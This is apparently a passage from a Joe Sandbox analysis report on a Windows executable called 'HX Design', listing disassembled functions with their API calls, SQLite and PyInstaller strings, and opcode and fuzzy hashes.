                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B219F30F0D242A1FA5873299A5513AD2425F447B0FD44734D93E47BD6DEACB849E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                      • Instruction ID: a6552da9b8e83610aa44058c33b145efd1b1d8ab4fd2ce3cfe5d778f4bc21481
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F118431618A4196E750AB52E85432AE2A0FB88FE4F940234D96D877A4DFBCD818C750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                                      • API String ID: 4225454184-1299490920
                                                                                                                                                                                                                                                      • Opcode ID: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
                                                                                                                                                                                                                                                      • Instruction ID: a890a4a33c2a732200e65e647b67636b6ad9e41b42b1644de489efb7ee599358
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8902BC22B0EB8282EB519B12E560BBA77A5FB44B94F144236DE6D477E8DF3CE451C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068EFD
                                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068F5A
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9
                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068FE5
                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069044
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069055
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF73206906A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                                                                      • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                      • Instruction ID: b0f7528cda2152583152ab0b82cf054dacf1a85aacce76245cca4c27958c7200
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341D762B19686A5FA30BB11A5402BAF394FF84BC4F840135DF8D57B89DEBCE508D724
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
                                                                                                                                                                                                                                                      • Instruction ID: ae95ac9b8c867ec8b41ff1625ac283e1ce2d5c8ee03a28578324f3ecd58753e9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42F18A7270AB8287DB909B55E050BAD77A4FB45BC8F548036EE9E43BA9DF39D844C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFB346705
                                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00007FFDFB346A2E
                                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFB34672E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                      • API String ID: 4225454184-272990098
                                                                                                                                                                                                                                                      • Opcode ID: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
                                                                                                                                                                                                                                                      • Instruction ID: d5af59292b552a68024325648d4469fd522a7f6a0ba903d7339c1acd0fcb3e67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BED1D362B0ABA2C2EB609F569864A792BE1FB41BC4F044171DE6D037E9DE3CE645C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetCurrentProcess.KERNEL32 ref: 00007FF732068590
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: OpenProcessToken.ADVAPI32 ref: 00007FF7320685A3
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetTokenInformation.ADVAPI32 ref: 00007FF7320685C8
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetLastError.KERNEL32 ref: 00007FF7320685D2
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetTokenInformation.ADVAPI32 ref: 00007FF732068612
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73206862E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: CloseHandle.KERNEL32 ref: 00007FF732068646
                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF73206916C
                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF732069175
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                      • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                      • Instruction ID: acf6b1592f859a49830db41f1cc66abec1b0fdd65fac89753ce5a9c2fc968da1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C216231B08742A1F610BB20E5152FAE261FF84780FD44036EA4D57B96DFBCD849E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                                      • Instruction ID: f8a309bf782bfead80f6c7faba27564923c3c78614d3a60fff6797397be4e488
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DD1B172B0A68687DB60DF19D094B69B3A5FF84B88F5A4032DE9D477A8DF38D841C740
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B2D7
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B30D
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B33A
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B34B
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B35C
                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B377
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                      • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                                      • Instruction ID: 4e2f5dd7773db595235df4696eed858f3ba725a20cb7e844db9264bc19a4165d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA11A230B0C642A2FA587329568513DD2429F447B0FD44735D83E877D6DEACB489E720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                      • API String ID: 4225454184-1987291987
                                                                                                                                                                                                                                                      • Opcode ID: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
                                                                                                                                                                                                                                                      • Instruction ID: 4177ddadef53e9b545355a0b52b6a081fde3ce1f6a711a7bdefec4afb0e871de
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94C1F421B4AA8386EB15DF15A460A7A67A0FB44BA4F084235DE7E077F8CF3DE485C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                      • Instruction ID: 39cdeae6c2100d715f89879c0607ef1891919f9f0ba030c4b52072c40c9f43dd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95A12772B0E6D246D7259B1994A0ABE7BE1FB80784F094235EBDA837D9DE3CD055C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2063813899
                                                                                                                                                                                                                                                      • Opcode ID: 0f4a477d62f3d65d23696e639a11322eccfa21096bcd5279f8ee82e5454cacc9
                                                                                                                                                                                                                                                      • Instruction ID: 5efef72272a8b7b8737d4e602dbe3739dc0bcfde1b530aaa29bc786303528305
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4a477d62f3d65d23696e639a11322eccfa21096bcd5279f8ee82e5454cacc9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E791C162B0AB82C3EB50DF159420ABA77E5FB44B84F499235DE6D477A9DF38E081C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                                      • Instruction ID: 9105c5a4d229e35e097819da35f1285e861bfee39b345d6262cf20b7cf873c5a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D591C362B092C29BD711AB26D1A0ABE77E0FB40B88F084136DB9D476E9DF3CE455C740
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
